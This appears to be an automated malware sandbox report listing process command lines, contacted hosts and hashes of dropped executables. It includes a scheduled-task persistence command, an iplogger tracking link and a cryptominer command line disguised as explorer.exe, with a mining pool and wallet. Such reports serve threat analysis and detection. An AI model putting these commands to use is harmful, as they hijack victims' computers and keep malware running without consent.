C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe383c46f8,0x7ffe383c4708,0x7ffe383c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.5.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.5.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| GB | 37.0.8.235:80 | N/A | tcp |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| N/A | 127.0.0.1:54195 | N/A | tcp |
| N/A | 127.0.0.1:54197 | N/A | tcp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.11.8:80 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| NL | 51.15.89.13:14433 | xmr-eu2.nanopool.org | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 51.89.23.91:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | N/A | tcp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | N/A | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3394285ab7e1ef48bc775f71ed7b0a76 |
| SHA1 | 646fadf1a0a0dafe07319c86de0587ed96a0fc2b |
| SHA256 | 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467 |
| SHA512 | 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/3744-45-0x0000000001420000-0x00000000014AF000-memory.dmp
memory/3744-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-49-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-48-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3744-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/4872-112-0x00000000005C0000-0x00000000005EC000-memory.dmp
memory/3888-111-0x0000000000350000-0x000000000043E000-memory.dmp
memory/4872-115-0x0000000000C90000-0x0000000000CB0000-memory.dmp
memory/4948-116-0x0000000000590000-0x00000000006D2000-memory.dmp
memory/4872-113-0x0000000000C80000-0x0000000000C86000-memory.dmp
memory/4948-118-0x0000000005480000-0x0000000005A24000-memory.dmp
memory/4948-119-0x0000000004F80000-0x0000000005012000-memory.dmp
memory/4872-117-0x0000000000CB0000-0x0000000000CB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
memory/3984-94-0x0000000000010000-0x0000000000018000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
memory/3744-55-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3744-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-47-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3744-46-0x000000006494A000-0x000000006494F000-memory.dmp
memory/3744-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3744-38-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4948-121-0x00000000052F0000-0x000000000538C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/2180-138-0x0000000000010000-0x0000000000020000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/4948-120-0x0000000005130000-0x000000000513A000-memory.dmp
memory/3692-143-0x0000000002230000-0x0000000002314000-memory.dmp
memory/2676-155-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/3744-165-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3744-171-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-170-0x0000000001420000-0x00000000014AF000-memory.dmp
memory/3744-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3744-161-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/3744-168-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3744-167-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2104-173-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/4948-174-0x0000000002710000-0x0000000002722000-memory.dmp
memory/1016-184-0x0000000000400000-0x0000000003346000-memory.dmp
memory/2180-185-0x00000000025F0000-0x00000000025FE000-memory.dmp
memory/2180-186-0x0000000002620000-0x0000000002632000-memory.dmp
memory/4948-199-0x0000000009020000-0x00000000090AC000-memory.dmp
memory/4948-200-0x0000000005430000-0x000000000544E000-memory.dmp
memory/2040-202-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
memory/4648-209-0x0000000002B60000-0x0000000002B96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
| MD5 | a628baa97881fa5528009c9470cadee0 |
| SHA1 | 583aa730e302fe0015cdb0dee4e279f193d66d87 |
| SHA256 | e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5 |
| SHA512 | c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf |
memory/2040-212-0x0000000005DF0000-0x0000000006408000-memory.dmp
memory/2040-213-0x0000000003230000-0x0000000003242000-memory.dmp
memory/2040-214-0x0000000005850000-0x000000000588C000-memory.dmp
memory/4648-215-0x00000000057B0000-0x0000000005DD8000-memory.dmp
memory/2040-216-0x0000000005890000-0x00000000058DC000-memory.dmp
memory/4648-217-0x00000000055A0000-0x00000000055C2000-memory.dmp
memory/4648-219-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/4648-218-0x0000000005640000-0x00000000056A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwvvhl0k.xs3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4648-229-0x0000000005EE0000-0x0000000006234000-memory.dmp
memory/2040-232-0x0000000005AD0000-0x0000000005BDA000-memory.dmp
memory/4648-233-0x0000000006470000-0x000000000648E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
memory/4648-235-0x0000000007440000-0x0000000007472000-memory.dmp
memory/4648-236-0x0000000074FB0000-0x0000000074FFC000-memory.dmp
memory/4648-246-0x0000000006A00000-0x0000000006A1E000-memory.dmp
memory/4648-248-0x0000000007680000-0x0000000007723000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a0486d6f8406d852dd805b66ff467692 |
| SHA1 | 77ba1f63142e86b21c951b808f4bc5d8ed89b571 |
| SHA256 | c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be |
| SHA512 | 065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a |
memory/4648-254-0x0000000007DE0000-0x000000000845A000-memory.dmp
memory/4648-255-0x00000000077A0000-0x00000000077BA000-memory.dmp
memory/4648-256-0x0000000007810000-0x000000000781A000-memory.dmp
